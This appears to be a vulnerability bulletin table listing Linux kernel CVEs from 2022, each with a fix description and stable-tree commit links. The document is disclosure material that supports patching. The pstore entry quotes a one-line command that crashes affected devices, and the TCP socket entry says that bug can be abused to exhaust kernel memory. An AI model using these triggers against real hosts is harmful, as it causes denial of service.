| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: hif_usb: Fix use-after-free in ath9k_hif_usb_reg_in_cb() It is possible that skb is freed in ath9k_htc_rx_msg(), then usb_submit_urb() fails and we try to free skb again. It causes a use-after-free bug. Moreover, if alloc_skb() fails, urb->context becomes NULL but rx_buf is not freed and there can be a memory leak. The patch removes unnecessary nskb and makes skb processing more clear: it is supposed that ath9k_htc_rx_msg() either frees old skb or passes its managing to another callback function. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-30 | not yet calculated | CVE-2022-50829 | https://git.kernel.org/stable/c/5e8751a977a49a6e00cce1a8da5ca16da83f9c8c https://git.kernel.org/stable/c/f127c2b4c967025e5c3a4ce7e13b79135d46a33d https://git.kernel.org/stable/c/0c8dd2ea4b419da96ab4953e4967e9363e2f8a4f https://git.kernel.org/stable/c/988bd27de2484faf17afe0408db2e3d9e5ac61fc https://git.kernel.org/stable/c/98d9172822dc6f38138333941984bd759a89d419 https://git.kernel.org/stable/c/355f16f756aad0c95cdaa0c14a34ab4137d32815 https://git.kernel.org/stable/c/53b9bb1a00c4285ee7f58a11129dbea015db61bc https://git.kernel.org/stable/c/71fc0ad671a62c494d2aec731baeabd3bfe6c95d https://git.kernel.org/stable/c/dd95f2239fc846795fc926787c3ae0ca701c9840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: auxdisplay: hd44780: Fix potential memory leak in hd44780_remove() hd44780_probe() allocates a memory chunk for hd with kzalloc() and makes "lcd->drvdata->hd44780" point to it. When we call hd44780_remove(), we should release all relevant memory and resource. But "lcd->drvdata->hd44780" is not released, which will lead to a memory leak. We should release the "lcd->drvdata->hd44780" in hd44780_remove() to fix the memory leak bug. | 2025-12-30 | not yet calculated | CVE-2022-50830 | https://git.kernel.org/stable/c/8311961a1724bfc64390c539dedc31e067a80315 https://git.kernel.org/stable/c/6cd37f8232f5e169a723e1d5fbe3b2139c2ef763 https://git.kernel.org/stable/c/5d407911e605702ffcc0e97a6db546592ab27dd0 https://git.kernel.org/stable/c/ddf75a86aba2cfb7ec4497e8692b60c8c8fe0ee7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: wilc1000: fix potential memory leak in wilc_mac_xmit() The wilc_mac_xmit() returns NETDEV_TX_OK without freeing skb, add dev_kfree_skb() to fix it. Compile tested only. | 2025-12-30 | not yet calculated | CVE-2022-50832 | https://git.kernel.org/stable/c/a12610e83789c838493034e5c50ac5c903ad8c0d https://git.kernel.org/stable/c/a1e94fb4d09d0fcfeaa73aa49d787f06c42db7ee https://git.kernel.org/stable/c/5706d00fde3f1d5eb7296a4dfefb6aea35108224 https://git.kernel.org/stable/c/07dcd756e28f27e4f8fcd8b809ffa05a5cc5de2b https://git.kernel.org/stable/c/baef42df7de7c35ba60b75a5f96d1eb039f4d782 https://git.kernel.org/stable/c/deb962ec9e1c9a81babd3d37542ad4bd6ac3396e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: use hdev->workqueue when queuing hdev->{cmd,ncmd}_timer works syzbot is reporting attempt to schedule hdev->cmd_work work from system_wq WQ into hdev->workqueue WQ which is under draining operation [1], for commit c8efcc2589464ac7 ("workqueue: allow chained queueing during destruction") does not allow such operation. The check introduced by commit 877afadad2dce8aa ("Bluetooth: When HCI work queue is drained, only queue chained work") was incomplete. Use hdev->workqueue WQ when queuing hdev->{cmd,ncmd}_timer works because hci_{cmd,ncmd}_timeout() calls queue_work(hdev->workqueue). Also, protect the queuing operation with RCU read lock in order to avoid calling queue_delayed_work() after cancel_delayed_work() completed. | 2025-12-30 | not yet calculated | CVE-2022-50833 | https://git.kernel.org/stable/c/c4635cf3d845a7324c25c52d549b70c8bd7ad4c7 https://git.kernel.org/stable/c/3c6b036fe5c8ed8b6c4cbdc03605929882907ef0 https://git.kernel.org/stable/c/deee93d13d385103205879a8a0915036ecd83261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: Fix potential resource leaks nfc_get_device() takes a reference for the device, add missing nfc_put_device() to release it when not needed anymore. Also fix the style warning by using error EOPNOTSUPP instead of ENOTSUPP. | 2025-12-30 | not yet calculated | CVE-2022-50834 | https://git.kernel.org/stable/c/277f0d0a9084e7454e5532c823a7a876a7b00af7 https://git.kernel.org/stable/c/d1d912e7f82d7216ba4e266048ec1d1f5ea93839 https://git.kernel.org/stable/c/d8e410315ad393b23520b5db0706be853589c548 https://git.kernel.org/stable/c/e0f5c962c066e769c187f037fedc883f8abd4e82 https://git.kernel.org/stable/c/b63bc2db244c1b57e36f16ea5f2a1becda413f68 https://git.kernel.org/stable/c/a743128fca394a43425020a4f287d3168d94d04f https://git.kernel.org/stable/c/b32f6bef248562bb5191ada527717ea50b319466 https://git.kernel.org/stable/c/df49908f3c52d211aea5e2a14a93bbe67a2cb3af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: add miss release buffer head in fc_do_one_pass() In fc_do_one_pass(), the buffer head is not released after use, which will lead to a reference count leak. | 2025-12-30 | not yet calculated | CVE-2022-50835 | https://git.kernel.org/stable/c/e65506ff181fc176088f32117d69b9cb1ddda777 https://git.kernel.org/stable/c/56fcd0788f0d9243c1754bd6f80b8b327c4afeee https://git.kernel.org/stable/c/27c7bd35135d5ab38b9138ecf186ce54a96c98d9 https://git.kernel.org/stable/c/1f48116cbd3404898c9022892e114dd7cc3063c1 https://git.kernel.org/stable/c/dfff66f30f66b9524b661f311bbed8ff3d2ca49f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: sysmon: fix memory leak in qcom_add_sysmon_subdev() The kfree() should be called when of_irq_get_byname() fails or devm_request_threaded_irq() fails in qcom_add_sysmon_subdev(), otherwise there will be a memory leak, so add kfree() to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50836 | https://git.kernel.org/stable/c/27441fab2651cd909d8a5440ca079bc50245f427 https://git.kernel.org/stable/c/e4539eb5c0c342567183fe386d0699c8dab49490 https://git.kernel.org/stable/c/131c0a3ead78d45f0f39ddb42cf1bd9be26239b0 https://git.kernel.org/stable/c/1a62bebe0705556d37cfa8409ddc759b11d404f6 https://git.kernel.org/stable/c/ec97e9a5c2f25d2f9f9d7005e9ac67f23cc751cd https://git.kernel.org/stable/c/e01ce676aaef3b13d02343d7e70f9637d93a3367 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: tag_8021q: avoid leaking ctx on dsa_tag_8021q_register() error path If dsa_tag_8021q_setup() fails, for example due to the inability of the device to install a VLAN, the tag_8021q context of the switch will leak. Make sure it is freed on the error path. | 2025-12-30 | not yet calculated | CVE-2022-50837 | https://git.kernel.org/stable/c/09f30f394e832ed09859b6a80fdd20668a9104ff https://git.kernel.org/stable/c/39691d51af99f80efb9e365f94b8e0c791fa1a2f https://git.kernel.org/stable/c/14ed46a13aba42a6ddd85de6f6274090df3586a5 https://git.kernel.org/stable/c/e095493091e850d5292ad01d8fbf5cde1d89ac53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stream: purge sk_error_queue in sk_stream_kill_queues() Changheon Lee reported TCP socket leaks, with a nice repro. It seems we leak TCP sockets with the following sequence: 1) SOF_TIMESTAMPING_TX_ACK is enabled on the socket. Each ACK will cook an skb put in error queue, from __skb_tstamp_tx(). __skb_tstamp_tx() is using skb_clone(), unless SOF_TIMESTAMPING_OPT_TSONLY was also requested. 2) If the application is also using MSG_ZEROCOPY, then we put in the error queue cloned skbs that had a struct ubuf_info attached to them. Whenever an struct ubuf_info is allocated, sock_zerocopy_alloc() does a sock_hold(). As long as the cloned skbs are still in sk_error_queue, socket refcount is kept elevated. 3) Application closes the socket, while error queue is not empty. Since tcp_close() no longer purges the socket error queue, we might end up with a TCP socket with at least one skb in error queue keeping the socket alive forever. This bug can be (ab)used to consume all kernel memory and freeze the host. We need to purge the error queue, with proper synchronization against concurrent writers. | 2025-12-30 | not yet calculated | CVE-2022-50838 | https://git.kernel.org/stable/c/c8c1eec578a9ae2dc8f14a1846942a0b7bf29d1d https://git.kernel.org/stable/c/bab542cf56fc174c8447c00b73be99ffd66d2d39 https://git.kernel.org/stable/c/6f00bd0402a1e3d2d556afba57c045bd7931e4d3 https://git.kernel.org/stable/c/4f1d37ff4226eb99d6b69e9f4518e279e1a851bf https://git.kernel.org/stable/c/9062493811676ee0efe6c74d98f00ca38c4e17d4 https://git.kernel.org/stable/c/9da204cd67c4fe97e8aa465d10d5c2e7076f7f42 https://git.kernel.org/stable/c/8c330c36b3970d0917f48827fa6c7a9c75aa4602 https://git.kernel.org/stable/c/b458d349f8753f666233828ebd30df6f100cf7d5 https://git.kernel.org/stable/c/e0c8bccd40fc1c19e1d246c39bcf79e357e1ada3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: fix potential buffer head reference count leak In 'jbd2_fc_wait_bufs', if a buffer isn't uptodate, it will return -EIO without updating 'journal->j_fc_off'. But 'jbd2_fc_release_bufs' will release buffer heads from 'j_fc_off - 1', and if 'bh' is NULL it will terminate the release, which will lead to a buffer head reference count leak. To solve the above issue, update 'journal->j_fc_off' before returning -EIO. | 2025-12-30 | not yet calculated | CVE-2022-50839 | https://git.kernel.org/stable/c/7a33dde572fceb45d02d188e0213c47059401c93 https://git.kernel.org/stable/c/e7385c868ee038d6a0cb0e85c22d2741e7910fd5 https://git.kernel.org/stable/c/68ed9c76b2affd47177b92495446abb7262d0ef7 https://git.kernel.org/stable/c/9b073d73725366d886b711b74e058c02f51e7a0e https://git.kernel.org/stable/c/e0d5fc7a6d80ac2406c7dfc6bb625201d0250a8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: snic: Fix possible UAF in snic_tgt_create() Smatch reports a warning as follows: drivers/scsi/snic/snic_disc.c:307 snic_tgt_create() warn: '&tgt->list' not removed from list If device_add() fails in snic_tgt_create(), tgt will be freed, but tgt->list will not be removed from snic->disc.tgt_list, then list traversal may cause UAF. Remove from snic->disc.tgt_list before free(). | 2025-12-30 | not yet calculated | CVE-2022-50840 | https://git.kernel.org/stable/c/f9d8b8ba0f1a16cde0b1fc9e80466df76b6db8ff https://git.kernel.org/stable/c/3772319e40527e6a5f2ec1d729e01f271d818f5c https://git.kernel.org/stable/c/3007f96ca20c848d0b1b052df6d2cb5ae5586e78 https://git.kernel.org/stable/c/6866154c23fba40888ad6d554cccd4bf2edb755e https://git.kernel.org/stable/c/ad27f74e901fc48729733c88818e6b96c813057d https://git.kernel.org/stable/c/1895e908b3ae66a5312fd1b2cdda2da82993dca7 https://git.kernel.org/stable/c/c7f0f8dab1ae5def57c1a8a9cafd6fabe1dc27cc https://git.kernel.org/stable/c/4141cd9e8b3379aea52a85d2c35f6eaf26d14e86 https://git.kernel.org/stable/c/e118df492320176af94deec000ae034cc92be754 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add overflow check for attribute size The offset addition could overflow and pass the used size check given an attribute with very large size (e.g., 0xffffff7f) while parsing MFT attributes. This could lead to out-of-bound memory R/W if we try to access the next attribute derived by Add2Ptr(attr, asize) [ 32.963847] BUG: unable to handle page fault for address: ffff956a83c76067 [ 32.964301] #PF: supervisor read access in kernel mode [ 32.964526] #PF: error_code(0x0000) - not-present page [ 32.964893] PGD 4dc01067 P4D 4dc01067 PUD 0 [ 32.965316] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 32.965727] CPU: 0 PID: 243 Comm: mount Not tainted 5.19.0+ #6 [ 32.966050] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 32.966628] RIP: 0010:mi_enum_attr+0x44/0x110 [ 32.967239] Code: 89 f0 48 29 c8 48 89 c1 39 c7 0f 86 94 00 00 00 8b 56 04 83 fa 17 0f 86 88 00 00 00 89 d0 01 ca 48 01 f0 8d 4a 08 39 f9a [ 32.968101] RSP: 0018:ffffba15c06a7c38 EFLAGS: 00000283 [ 32.968364] RAX: ffff956a83c76067 RBX: ffff956983c76050 RCX: 000000000000006f [ 32.968651] RDX: 0000000000000067 RSI: ffff956983c760e8 RDI: 00000000000001c8 [ 32.968963] RBP: ffffba15c06a7c38 R08: 0000000000000064 R09: 00000000ffffff7f [ 32.969249] R10: 0000000000000007 R11: ffff956983c760e8 R12: ffff95698225e000 [ 32.969870] R13: 0000000000000000 R14: ffffba15c06a7cd8 R15: ffff95698225e170 [ 32.970655] FS: 00007fdab8189e40(0000) GS:ffff9569fdc00000(0000) knlGS:0000000000000000 [ 32.971098] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 32.971378] CR2: ffff956a83c76067 CR3: 0000000002c58000 CR4: 00000000000006f0 [ 32.972098] Call Trace: [ 32.972842] <TASK> [ 32.973341] ni_enum_attr_ex+0xda/0xf0 [ 32.974087] ntfs_iget5+0x1db/0xde0 [ 32.974386] ? slab_post_alloc_hook+0x53/0x270 [ 32.974778] ? ntfs_fill_super+0x4c7/0x12a0 [ 32.975115] ntfs_fill_super+0x5d6/0x12a0 [ 32.975336] get_tree_bdev+0x175/0x270 [ 32.975709] ? put_ntfs+0x150/0x150 [ 32.975956] ntfs_fs_get_tree+0x15/0x20 [ 32.976191] vfs_get_tree+0x2a/0xc0 [ 32.976374] ? capable+0x19/0x20 [ 32.976572] path_mount+0x484/0xaa0 [ 32.977025] ? putname+0x57/0x70 [ 32.977380] do_mount+0x80/0xa0 [ 32.977555] __x64_sys_mount+0x8b/0xe0 [ 32.978105] do_syscall_64+0x3b/0x90 [ 32.978830] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 32.979311] RIP: 0033:0x7fdab72e948a [ 32.980015] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 32.981251] RSP: 002b:00007ffd15b87588 EFLAGS: 00000206 ORIG_RAX: 00000000000000a5 [ 32.981832] RAX: ffffffffffffffda RBX: 0000557de0aaf060 RCX: 00007fdab72e948a [ 32.982234] RDX: 0000557de0aaf260 RSI: 0000557de0aaf2e0 RDI: 0000557de0ab7ce0 [ 32.982714] RBP: 0000000000000000 R08: 0000557de0aaf280 R09: 0000000000000020 [ 32.983046] R10: 00000000c0ed0000 R11: 0000000000000206 R12: 0000557de0ab7ce0 [ 32.983494] R13: 0000557de0aaf260 R14: 0000000000000000 R15: 00000000ffffffff [ 32.984094] </TASK> [ 32.984352] Modules linked in: [ 32.984753] CR2: ffff956a83c76067 [ 32.985911] ---[ end trace 0000000000000000 ]--- [ 32.986555] RIP: 0010:mi_enum_attr+0x44/0x110 [ 32.987217] Code: 89 f0 48 29 c8 48 89 c1 39 c7 0f 86 94 00 00 00 8b 56 04 83 fa 17 0f 86 88 00 00 00 89 d0 01 ca 48 01 f0 8d 4a 08 39 f9a [ 32.988232] RSP: 0018:ffffba15c06a7c38 EFLAGS: 00000283 [ 32.988532] RAX: ffff956a83c76067 RBX: ffff956983c76050 RCX: 000000000000006f [ 32.988916] RDX: 0000000000000067 RSI: ffff956983c760e8 RDI: 00000000000001c8 [ 32.989356] RBP: ffffba15c06a7c38 R08: 0000000000000064 R09: 00000000ffffff7f [ 32.989994] R10: 0000000000000007 R11: ffff956983c760e8 R12: ffff95698225e000 [ 32.990415] R13: 0000000000000000 R14: ffffba15c06a7cd8 R15: ffff95698225e170 [ 32.991011] FS: ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50841 | https://git.kernel.org/stable/c/d4489ba8fb806e07b43eecca5e9af5865d94cbf6 https://git.kernel.org/stable/c/a1f0b873cf6ac1f00a749707d866494ed0708978 https://git.kernel.org/stable/c/0bb9f93ba63acfdb7c363d9f9fc2199fc6fa913d https://git.kernel.org/stable/c/e19c6277652efba203af4ecd8eed4bd30a0054c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/virtio: Check whether transferred 2D BO is shmem A transferred 2D BO must always be a shmem BO. Add a check for that to prevent a NULL dereference if userspace passes a VRAM BO. | 2025-12-30 | not yet calculated | CVE-2022-50842 | https://git.kernel.org/stable/c/f134f261d76ae3d5ecf68db642eaa746ceb84cfb https://git.kernel.org/stable/c/f122bcb34f1a4b02ef3d95058d8fd1316ea03785 https://git.kernel.org/stable/c/989164305b933af06d69bb91044dafbd01025371 https://git.kernel.org/stable/c/36e133af33ea54193378b190cf92c47c12a43d34 https://git.kernel.org/stable/c/e473216b42aa1fd9fc6b94b608b42c210c655908 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm clone: Fix UAF in clone_dtr() Dm_clone also has the same UAF problem when dm_resume() and dm_destroy() are concurrent. Therefore, cancel the timer again in clone_dtr(). | 2025-12-30 | not yet calculated | CVE-2022-50843 | https://git.kernel.org/stable/c/520b56cfd9faee7683f081c3a38f11a81b13a68e https://git.kernel.org/stable/c/342cfd8426dff4228e6c714bcb9fc8295a2748dd https://git.kernel.org/stable/c/856edd0e92f3fe89606b704c86a93daedddfe6ec https://git.kernel.org/stable/c/b1ddb666073bb5f36390aaabaa1a4d48d78c52ed https://git.kernel.org/stable/c/9e113cd4f61f3b0000843b2d0a90ce8b40a1fcff https://git.kernel.org/stable/c/e4b5957c6f749a501c464f92792f1c8e26b61a94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix type of second parameter in odn_edit_dpm_table() callback With clang's kernel control flow integrity (kCFI, CONFIG_CFI_CLANG), indirect call targets are validated against the expected function pointer prototype to make sure the call target is valid to help mitigate ROP attacks. If they are not identical, there is a failure at run time, which manifests as either a kernel panic or thread getting killed. A proposed warning in clang aims to catch these at compile time, which reveals: drivers/gpu/drm/amd/amdgpu/../pm/swsmu/amdgpu_smu.c:3008:29: error: incompatible function pointer types initializing 'int (*)(void *, uint32_t, long *, uint32_t)' (aka 'int (*)(void *, unsigned int, long *, unsigned int)') with an expression of type 'int (void *, enum PP_OD_DPM_TABLE_COMMAND, long *, uint32_t)' (aka 'int (void *, enum PP_OD_DPM_TABLE_COMMAND, long *, unsigned int)') [-Werror,-Wincompatible-function-pointer-types-strict] .odn_edit_dpm_table = smu_od_edit_dpm_table, ^~~~~~~~~~~~~~~~~~~~~ 1 error generated. There are only two implementations of ->odn_edit_dpm_table() in 'struct amd_pm_funcs': smu_od_edit_dpm_table() and pp_odn_edit_dpm_table(). One has a second parameter type of 'enum PP_OD_DPM_TABLE_COMMAND' and the other uses 'u32'. Ultimately, smu_od_edit_dpm_table() calls ->od_edit_dpm_table() from 'struct pptable_funcs' and pp_odn_edit_dpm_table() calls ->odn_edit_dpm_table() from 'struct pp_hwmgr_func', which both have a second parameter type of 'enum PP_OD_DPM_TABLE_COMMAND'. Update the type parameter in both the prototype in 'struct amd_pm_funcs' and pp_odn_edit_dpm_table() to 'enum PP_OD_DPM_TABLE_COMMAND', which cleans up the warning. | 2025-12-30 | not yet calculated | CVE-2022-50844 | https://git.kernel.org/stable/c/f9084e9930db562bdcd47fa199a66fb45e16dab5 https://git.kernel.org/stable/c/24cba9d865157c9e23128fbcf8b86f5da9570edd https://git.kernel.org/stable/c/36217f676b55932a12d6732c95388150015fdee6 https://git.kernel.org/stable/c/e4d0ef752081e7aa6ffb7ccac11c499c732a2e05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix inode leak in ext4_xattr_inode_create() on an error path There is an issue as follows when doing setxattr with fault injection: [localhost]# fsck.ext4 -fn /dev/sda e2fsck 1.46.6-rc1 (12-Sep-2022) Pass 1: Checking inodes, blocks, and sizes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Unattached zero-length inode 15. Clear? no Unattached inode 15 Connect to /lost+found? no Pass 5: Checking group summary information /dev/sda: ********** WARNING: Filesystem still has errors ********** /dev/sda: 15/655360 files (0.0% non-contiguous), 66755/2621440 blocks This occurs in 'ext4_xattr_inode_create()'. If 'ext4_mark_inode_dirty()' fails, dropping i_nlink of the inode is needed. Otherwise it will lead to an inode leak. | 2025-12-30 | not yet calculated | CVE-2022-50845 | https://git.kernel.org/stable/c/0f709e08caffb41bbc9b38b9a4c1bd0769794007 https://git.kernel.org/stable/c/eab94a46560f68d4bcd15222701ced479f84f427 https://git.kernel.org/stable/c/9ef603086c5b796fde1c7f22a17d0fc826ba54cb https://git.kernel.org/stable/c/9882601ee689975c1c0076ee65bf222a2a35e535 https://git.kernel.org/stable/c/322cf639b0b7f137543072c55545adab782b3a25 https://git.kernel.org/stable/c/fdaaf45786dc8c17a72901021772520fceb18f8c https://git.kernel.org/stable/c/70e5b46beba64706430a87a6d516054225e8ac8a https://git.kernel.org/stable/c/e4db04f7d3dbbe16680e0ded27ea2a65b10f766a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: via-sdmmc: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, it will lead to two issues: 1. The memory allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete the device, but it was never added, which will lead to a kernel crash because of a null-ptr-deref in device_del(). Fix this by checking the return value and going to the error path, which will call mmc_free_host(). | 2025-12-30 | not yet calculated | CVE-2022-50846 | https://git.kernel.org/stable/c/076bcd2c93e16b05c10564e299d6e5d26a766d00 https://git.kernel.org/stable/c/12b8e81b77c05c658efd9cde3585bbd65ae39b59 https://git.kernel.org/stable/c/95025a8dd0ec015872f6c16473fe04d6264e68ca https://git.kernel.org/stable/c/f59ef2a47a228e51322ad76752a55a8917c56e38 https://git.kernel.org/stable/c/63400da6cd37a9793c19bb6aed7131b58b975a04 https://git.kernel.org/stable/c/0959cc1685eb19774300d43ef25e318b457b156b https://git.kernel.org/stable/c/0ec94795114edc7e24ec71849dce42bfa61dafa3 https://git.kernel.org/stable/c/ba91b413983a9235792523c6b9f7ba2586c4d75d https://git.kernel.org/stable/c/e4e46fb61e3bb4628170810d3f2b996b709b90d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/bridge: it6505: Initialize AUX channel in it6505_i2c_probe During device boot, the HPD interrupt could be triggered before the DRM subsystem registers it6505 as a DRM bridge. In such cases, the driver tries to access the AUX channel and causes a NULL pointer dereference. Initialize the AUX channel earlier to prevent such an error. | 2025-12-30 | not yet calculated | CVE-2022-50847 | https://git.kernel.org/stable/c/8ed8505803774fc3f36a432718036c21cc51e2ba https://git.kernel.org/stable/c/172d4d64075075f955e6e416915e3f287eec514a https://git.kernel.org/stable/c/e577d4b13064c337b83fe7edecb3f34e87144821 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: dio: fix possible memory leak in dio_init() If device_register() returns an error, the 'dev' and the name need to be freed. Add a release function, and then call put_device() in the error path, so the name is freed in kobject_cleanup() and the 'dev' is freed in the release function. | 2025-12-30 | not yet calculated | CVE-2022-50848 | https://git.kernel.org/stable/c/affe3cea6b3148fa66796a48640664822ceccd48 https://git.kernel.org/stable/c/4b68caa95064ac464f1b261d08ac677e753d1088 https://git.kernel.org/stable/c/a524e7fed696a4dfef671e0fda3511bfd2dca0cf https://git.kernel.org/stable/c/da64e01da40c6b71a54144126da53cc3b27201ac https://git.kernel.org/stable/c/fce9890e1be4c0460dad850cc8c00414a9d25f0f https://git.kernel.org/stable/c/a0ead7e8da84f4c3759417b8e928b65e0207c646 https://git.kernel.org/stable/c/8e002b9fe831b27d4506df6fa60cb33ba0730ac3 https://git.kernel.org/stable/c/78fddc0ff971f9874d53c854818cc4aafa144114 https://git.kernel.org/stable/c/e63e99397b2613d50a5f4f02ed07307e67a190f1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore: Avoid kcore oops by vmap()ing with VM_IOREMAP An oops can be induced by running 'cat /proc/kcore > /dev/null' on devices using pstore with the ram backend because kmap_atomic() assumes lowmem pages are accessible with __va(). Unable to handle kernel paging request at virtual address ffffff807ff2b000 Mem abort info: ESR = 0x96000006 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000006 CM = 0, WnR = 0 swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000081d87000 [ffffff807ff2b000] pgd=180000017fe18003, p4d=180000017fe18003, pud=180000017fe18003, pmd=0000000000000000 Internal error: Oops: 96000006 [#1] PREEMPT SMP Modules linked in: dm_integrity CPU: 7 PID: 21179 Comm: perf Not tainted 5.15.67-10882-ge4eb2eb988cd #1 baa443fb8e8477896a370b31a821eb2009f9bfba Hardware name: Google Lazor (rev3 - 8) (DT) pstate: a0400009 (NzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __memcpy+0x110/0x260 lr : vread+0x194/0x294 sp : ffffffc013ee39d0 x29: ffffffc013ee39f0 x28: 0000000000001000 x27: ffffff807ff2b000 x26: 0000000000001000 x25: ffffffc0085a2000 x24: ffffff802d4b3000 x23: ffffff80f8a60000 x22: ffffff802d4b3000 x21: ffffffc0085a2000 x20: ffffff8080b7bc68 x19: 0000000000001000 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: ffffffd3073f2e60 x14: ffffffffad588000 x13: 0000000000000000 x12: 0000000000000001 x11: 00000000000001a2 x10: 00680000fff2bf0b x9 : 03fffffff807ff2b x8 : 0000000000000001 x7 : 0000000000000000 x6 : 0000000000000000 x5 : ffffff802d4b4000 x4 : ffffff807ff2c000 x3 : ffffffc013ee3a78 x2 : 0000000000001000 x1 : ffffff807ff2b000 x0 : ffffff802d4b3000 Call trace: __memcpy+0x110/0x260 read_kcore+0x584/0x778 proc_reg_read+0xb4/0xe4 During early boot, memblock reserves the pages for the ramoops reserved memory node in DT that would otherwise be part of the direct lowmem mapping. Pstore's ram backend reuses those reserved pages to change the memory type (writeback or non-cached) by passing the pages to vmap() (see pfn_to_page() usage in persistent_ram_vmap() for more details) with specific flags. When read_kcore() starts iterating over the vmalloc region, it runs over the virtual address that vmap() returned for ramoops. In aligned_vread() the virtual address is passed to vmalloc_to_page() which returns the page struct for the reserved lowmem area. That lowmem page is passed to kmap_atomic(), which effectively calls page_to_virt() that assumes a lowmem page struct must be directly accessible with __va() and friends. These pages are mapped via vmap() though, and the lowmem mapping was never made, so accessing them via the lowmem virtual address oopses like above. Let's side-step this problem by passing VM_IOREMAP to vmap(). This will tell vread() to not include the ramoops region in the kcore. Instead the area will look like a bunch of zeros. The alternative is to teach kmap() about vmalloc areas that intersect with lowmem. Presumably such a change isn't a one-liner, and there isn't much interest in inspecting the ramoops region in kcore files anyway, so the most expedient route is taken for now. | 2025-12-30 | not yet calculated | CVE-2022-50849 | https://git.kernel.org/stable/c/1579bed1613802a323a1e14567faa95c149e105e https://git.kernel.org/stable/c/fdebcc33b663d2e8da937653ddfbfc1315047eaa https://git.kernel.org/stable/c/6d9460214e363e1f3d0756ee5d947e76e3e6f86c https://git.kernel.org/stable/c/4d3126f242a0090342ffe925c35fb4f4252b7562 https://git.kernel.org/stable/c/295f59cd2cdeed841850d02dddde3a122cbf6fc6 https://git.kernel.org/stable/c/ebc73c4f266281e2cad1a372ecd81572d95375b6 https://git.kernel.org/stable/c/69dbff7d2681c55a4d979fd9b75576303e69979f https://git.kernel.org/stable/c/2f82381d0681b10f9ddd27be98c27363b5a3cd1c https://git.kernel.org/stable/c/e6b842741b4f39007215fd7e545cb55aa3d358a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ipr: Fix WARNING in ipr_init() ipr_init() will not call unregister_reboot_notifier() when pci_register_driver() fails, which causes a WARNING. Call unregister_reboot_notifier() when pci_register_driver() fails. notifier callback ipr_halt [ipr] already registered WARNING: CPU: 3 PID: 299 at kernel/notifier.c:29 notifier_chain_register+0x16d/0x230 Modules linked in: ipr(+) xhci_pci_renesas xhci_hcd ehci_hcd usbcore led_class gpu_sched drm_buddy video wmi drm_ttm_helper ttm drm_display_helper drm_kms_helper drm drm_panel_orientation_quirks agpgart cfbft CPU: 3 PID: 299 Comm: modprobe Tainted: G W 6.1.0-rc1-00190-g39508d23b672-dirty #332 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org 04/01/2014 RIP: 0010:notifier_chain_register+0x16d/0x230 Call Trace: <TASK> __blocking_notifier_chain_register+0x73/0xb0 ipr_init+0x30/0x1000 [ipr] do_one_initcall+0xdb/0x480 do_init_module+0x1cf/0x680 load_module+0x6a50/0x70a0 __do_sys_finit_module+0x12f/0x1c0 do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-30 | not yet calculated | CVE-2022-50850 | https://git.kernel.org/stable/c/020b66023712b1cc42c6ab8b76e4ec13efe4a092 https://git.kernel.org/stable/c/e965c4a60c1daa6e24355e35d78ca8e9f195196f https://git.kernel.org/stable/c/5debd337f534b122f7c5eac6557a41b5636c9b51 https://git.kernel.org/stable/c/eccbec017c95b9b9ecd4c05c6f5234d1487c72cc https://git.kernel.org/stable/c/f4ba143b04a17559f2c85e18b47db117f40d8cf3 https://git.kernel.org/stable/c/e59da172059f05c594fda03a9e8a3a0e1f5116c0 https://git.kernel.org/stable/c/8c739021b2022fbc40f71d3fa2e9162beef0c84a https://git.kernel.org/stable/c/4399a8632e5f8f1f695d91d992c7d418fb451f07 https://git.kernel.org/stable/c/e6f108bffc3708ddcff72324f7d40dfcd0204894 |
